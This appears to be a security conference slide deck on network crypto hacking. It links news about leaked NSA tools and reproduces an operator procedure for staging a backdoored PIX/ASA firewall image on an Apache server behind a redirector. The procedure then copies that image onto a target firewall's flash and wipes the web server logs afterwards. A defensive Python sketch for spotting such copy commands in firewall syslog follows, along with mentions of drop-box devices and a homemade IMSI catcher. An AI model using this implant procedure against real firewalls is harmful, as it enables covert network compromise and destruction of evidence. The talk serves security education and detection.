SWAT Style – Live Network Crypto Hacking and Exploitation, by Kevin Cardwell and Wayne Burke
Presenters: Kevin Cardwell & Wayne Burke
Network Crypto Hacking:
http://thehackernews.com/2016/09/xiaomi-android-backdoor.html
https://securelist.com/blog/incidents/75812/the-equation-giveaway/
http://thehackernews.com/2016/08/nsa-hacking-tools.html
http://thehackernews.com/2016/08/nsa-hack-russia-leak.html
http://thehackernews.com/2016/08/nsa-hack-exploit.html
http://thehackernews.com/2016/08/cisco-firewall-hack.html
http://thehackernews.com/2015/10/nsa-crack-encryption.html
Mystery Solved ??
https://twitter.com/SilentSignalHU/status/768095445444861952?ref_src=twsrc%5Etfw
Diving into tactics:
• In the next few slides we will review some detailed, really simple tactics.
• The ultimate goal: eventually owning your entire environment.
# Before you even get to the op, you need to create a PIX/ASA IOS image,
# key it, and test it. Bring the image and the key to the op.
########## How to get Apache installed on the ops station ##########
# cd to the Apache tools directory
cd /current/bin/FW/Tools/Apache
# Run this first to get the RPM to install without issue
rpm -e httpd httpd-suexec mod_ssl apr-util
# Run this next to load apache rpm's
rpm -hiv *.rpm
# In this directory is modified versions of the config files
cp httpd.conf /etc/httpd/conf/httpd.conf
cp ssl.conf /etc/httpd/conf.d/ssl.conf
Apache Implant – Staging your Hack
# Create a test html file
echo "<html><body>This is a test</body></html>" > /var/www/html/index.html
# Put the image file you want to up/download into this directory with a
# common name:
cp /mnt/zip/<project>.<ip>_bg2011_pix633.bin /var/www/html/pix633.bin
# Set permissions for items in html directory
chmod 744 /var/www/html/*
# Start up the apache server
service httpd start
# Start up your browser to verify it works.
# You should get a pop-up asking to verify the ssl cert.
# Then you'll get the index.html page which will say "This is a test".
firefox https://127.0.0.1:4443 &
# Setup a remote listener on 443 on redirector to hit apache on 4443
-tunnel
r 443 127.0.0.1 4443
# Now you are ready to go to the target pix and run this command
copy https://<ip of redirector>:<port if !443>/<name of image file> flash
# Log off of the pix
exit
######## Getting Ops Station Back to normal ########
# Once the upload is done, stop apache
service httpd stop
# Remove installed rpm's
rpm -e httpd httpd-suexec mod_ssl apr-util
# Then you need to remove any directories still remaining.
rm -rf /var/log/httpd /etc/httpd /var/www
#### OTHER INFO ####
# To install apache, you need 3 rpm's:
# httpd-2.0.52-19.ent.i386.rpm
# httpd-suexec-2.0.52-19.ent.i386.rpm
# mod_ssl-2.0.52-19.ent.i386.rpm
# apr-util-0.9.4-17.i386.rpm
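From the defender's side, the staging procedure above ends with a `copy https://... flash` command typed on the firewall itself, and the device's command audit log records it. The following detection sketch is an added example, not part of the original slides; it assumes PIX/ASA syslog message 111008 ("User ... executed the ... command") is being collected, and the sample log lines, hostnames, and the `approved_hosts` allowlist are constructed for illustration.

```python
import re
from urllib.parse import urlsplit

# PIX/ASA syslog message 111008 records each command a user executes.
CMD_RE = re.compile(
    r"%(?:PIX|ASA)-\d-111008: User '(?P<user>[^']*)' "
    r"executed the '(?P<cmd>.*)' command"
)
# "copy [/options] <scheme>://<source> <flash|diskN>..." pulls a remote file onto flash.
COPY_RE = re.compile(
    r"^copy\s+(?:/\S+\s+)*(?P<scheme>https?|tftp|ftp|scp)://(?P<src>\S+)"
    r"\s+(?P<dst>(?:flash|disk\d)\S*)",
    re.IGNORECASE,
)

# Constructed sample lines (documentation-range addresses), not real logs.
SAMPLE_LOG = [
    "Sep 12 03:14:07 fw1 %PIX-5-111008: User 'enable_15' executed the "
    "'copy https://203.0.113.7/pix633.bin flash' command.",
    "Sep 12 03:15:40 fw1 %PIX-5-111008: User 'enable_15' executed the 'exit' command.",
    "Sep 13 10:02:11 fw2 %ASA-5-111008: User 'netops' executed the "
    "'copy /noconfirm tftp://192.0.2.10/asa-image.bin disk0:/asa-image.bin' command.",
    "Sep 13 10:05:00 fw2 %ASA-5-111008: User 'netops' executed the "
    "'copy running-config startup-config' command.",
]


def find_flash_copies(lines, approved_hosts=frozenset()):
    """Return remote-to-flash copy commands whose source host is not approved."""
    findings = []
    for line in lines:
        audit = CMD_RE.search(line)
        copy = audit and COPY_RE.match(audit["cmd"].strip())
        if not copy:
            continue  # not a command record, or not a remote copy to flash
        scheme = copy["scheme"].lower()
        host = urlsplit(f"{scheme}://{copy['src']}").hostname
        if host not in approved_hosts:
            findings.append({"user": audit["user"], "scheme": scheme,
                             "host": host, "dest": copy["dst"], "line": line})
    return findings


if __name__ == "__main__":
    # Hypothetical allowlist: the only server images are normally pulled from.
    for f in find_flash_copies(SAMPLE_LOG, approved_hosts={"192.0.2.10"}):
        print(f"ALERT {f['user']} copied {f['scheme']}://{f['host']} -> {f['dest']}")
```

An alert here is a prompt to compare the hash of the running image against the vendor-published value, since the procedure above replaces the image on flash.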
Scripting the implant:
Game: What does a Hacker See …… …… ?
when using a very cheap single board mobile ARM device…
Let's role play
Sample Commercial Products
• PWN PLUG V4 Latest - $1,095.00 – Expensive Open Source Support!!
Can we do better for less?
• Our MAK Base 1 or 2:
A flying Heli IMSI Catcher / Stingray Homemade with BladeRF SDR